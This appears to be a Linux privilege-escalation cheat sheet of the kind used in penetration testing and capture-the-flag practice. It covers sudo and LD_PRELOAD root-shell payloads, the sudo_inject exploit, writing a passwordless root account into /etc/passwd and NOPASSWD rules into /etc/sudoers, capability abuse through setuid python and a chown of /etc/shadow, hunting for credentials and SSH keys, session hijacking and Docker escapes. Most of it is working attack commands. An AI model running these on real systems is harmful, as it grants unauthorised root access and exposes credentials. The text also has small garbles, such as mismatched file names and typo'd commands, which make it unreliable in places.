Manual checks can helpunderstand way more how attacks work. Check this out !
Walkthrough
SUDO
# check sudo version for exploits
sudo -V | grep βSudo verβ
# check rights
sudo -l
# gtfobins !
# sudo LD_PRELOAD
Defaults env_keep += LD_PRELOAD
# COMPILE /tmp/exploit.c :
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
# with :
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Execute any binary with the LD_PRELOAD to spawn a shell :
sudo LD_PRELOAD=<full_path_to_so_file> <program>
sudo LD_PRELOAD=/tmp/shell.so find
# sudo_inject | https://github.com/nongiach/sudo_inject
# requirements :
# Ptrace fully enabled (/proc/sys/kernel/yama/ptrace_scope == 0).
# Current user must have living process that has a valid sudo token with the same uid.
sudo whatever
sh exploit.sh
# wait
sudo -i
# root !
User infos
id
wwhoami
w
last
cat /etc/passwd
cat /etc/sudoers
cat /etc/group
Kernel version
uname -a
lsb_release -a
cat /proc/version /etc/issue /etc/*-release
# check for cves
Files, binaries and passwords
ls -la ~/
ls -la /var/mail /home/*/ /var/spool/mail /home/*/.bash_history /var
# check those files for hashes
cat /etc/passwd
cat /etc/shadow
ls -la /etc/passwd /etc/shadow
# can we write to the .bashsrc file ? if so, can be executed when us logs in
ls -la /root/.bashrc
ls -la /home/*/.bashrc
locate .bashrc
find / -name .bashrc -xdev 2>/dev/null
Processes and ports
# something is running that we can exploit ?
ps aux | grep root
# localhost open ports ?
netstat -antup
# any useful info in the main bash user files ?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
CronTabs & Scheduled jobs
# check for cronjobs
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron; ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
# PSPY to to see commands run by other users, cron jobs, etc. in real time
./pspy > pspy-out.txt
File systems
# unmounted file-systems ?
cat /etc/fstab
# If NFS is open, check if the target has any open NFS shares, if it does, then mount it to your filesystem
showmount -e X.X.X.X
mount X.X.X.X:/ /tmp/mount1
Applications
# check installed apps + versions + running ?
ls -alh /usr/bin/ /sbin/ /var/cache/apt/archives /var/cache/yum/
dpkg -l
rpm -qa
# Any useful applications installed?
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp tmux screen nmap 2>/dev/null
Sessions
# can we hijack any shell sessions ?
tmux ls
tmux attach -t tmuxname
screen -ls
screen-dr sessionname
byobu list-session
Memory
# some services can save clear-text creds in memory
ps aux # grab the process id
gdb -p SERVICE; gdb PROCID
# in memory passwords
strings /dev/mem -n10 | grep -i PASS
Files permissions
# Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
# ssh
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
# World writable files on the system
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
# writable /etc/passwd
# add :
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy
# writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
# World executable folder
find / -perm -o x -type d 2>/dev/null
# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
SUID / SGID / GUID
# SUID / SGID
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null | xargs ls -l
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
# Look for any binaries that seem odd. Any binaries running from a users home directory?
# Check the version of any odd binaries and see if there are any public exploits that can be used to gain root
# SUID PATH
echo $PATH
env | grep PATH
print $PATH
Capabilities
Check for files withcapabilities. These may allow us to access restricted files or directories. Having the capability=epmeans the binary has all the capabilities.
/usr/bin/getcap -r /usr/bin
getcap -r / 2>/dev/null
## Interesting capabilities
getcap openssl /usr/bin/openssl
openssl=ep
# the following capabilities can be used in order to upgrade your current privileges.
cap_dac_read_search # read anything
cap_setuid+ep # setuid
# EXAMPLES
# 1
# linpeas /usr/local/bin/ruby = cap_chown+ep
echo 'File.chown(<User ID>, nil, "/etc/shadow")' > exploit.rb
ruby exploit.rb
chmod 777 /etc/shadow
nano /etc/shadow
# 2
# cap_setuid+ep python2.7
python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)
Capabilities list
Capabilities name
Description
CAP_AUDIT_CONTROL
Allow to enable/disable kernel auditing
CAP_AUDIT_WRITE
Helps to write records to kernel auditing log
CAP_BLOCK_SUSPEND
This feature can block system suspends
CAP_CHOWN
Allow user to make arbitrary change to files UIDs and GIDs
CAP_DAC_OVERRIDE
This helps to bypass file read, write and execute permission checks
CAP_DAC_READ_SEARCH
This only bypasses file and directory read/execute permission checks
CAP_FOWNER
This enables bypass of permission checks on operations that normally require the filesystem UID of the process to match the UID of the file
CAP_KILL
Allow the sending of signals to processes belonging to others
CAP_SETGID
Allow changing of the GID
CAP_SETUID
Allow changing of the UID
CAP_SETPCAP
Helps to transferring and removal of current set to any PID
CAP_IPC_LOCK
This helps to lock memory
CAP_MAC_ADMIN
Allow MAC configuration or state changes
CAP_NET_RAW
Use RAW and PACKET sockets
CAP_NET_BIND_SERVICE
SERVICE Bind a socket to internet domain privileged ports
Docker
docker run -it -v /:/mnt bash chroot
docker run -v /root:/mnt -it bash
